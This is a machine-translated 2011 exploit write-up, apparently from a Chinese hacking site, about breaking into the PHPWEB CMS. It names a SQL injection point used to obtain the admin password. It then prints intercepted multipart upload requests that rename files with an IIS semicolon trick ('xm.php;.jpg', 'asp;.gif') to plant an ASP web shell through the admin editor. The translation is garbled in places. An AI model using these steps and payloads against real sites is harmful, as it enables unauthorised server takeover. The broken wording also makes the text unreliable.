PHPWEB background holding SHELL editor capture NC vulnerability and fix-vulnerability warning-the black bar safety net

2011-10-09T00:00:00
ID MYHACK58:62201132032
Type myhack58
Reporter 佚名
Modified 2011-10-09T00:00:00

Description

Just finished watching the TV idle to sleep, just looking for a CMS in this play, PHPWEB so bad Ah, the back-end editor since the existence of such a primary vulnerability, just to see one individual who said the capture after so modified:

Only applicable to IIS.... apache didn't have to play....

First with the injection point ran out of password

down/class/index. php? myord=1

之后 后台 地址 是 admin.php

Log in,find a published article,find a published article somewhere,such as

down/admin/down_conadd.php

Point the following detailed description of the picture inside the button`after selecting a file to upload

This time of capture or with the local agent tool

-----------------------------7db229330de4

www.2cto.com Content-Disposition: form-data; name="fileName"

201108181313610483553.jpg

-----------------------------7db229330de4

Content-Disposition: form-data; name="attachPath"

down/pics/

-----------------------------7db229330de4

Content-Disposition: form-data; name="fileData"; filename="xm.jpg"

Content-Type: text/plain

Get the above message...

Own configuration,the filename="xm.jpg"to filename="xm.php;. jpg"

After the contract is OK...

This I tried, no matter.

Later try to try to change after generation of the file name truncated, similar to the lower so

-----------------------------7db29f214078c

Content-Disposition: form-data; name="fileName"

2 0 1 1 0 9 2 4 1 3 1 6 8 0 8 2 7 3 6 7 1. asp;. gif

-----------------------------7db29f214078c

Content-Disposition: form-data; name="attachPath"

news/pics/

-----------------------------7db29f214078c

Content-Disposition: form-data; name="fileData"; filename="2. asp;. gif"

Content-Type: text/plain

gb2312

<%

on error resume next

%>

This back to work.

I think the question is not like this editor there are NC submit a question? I'll try the other.

from: zgg space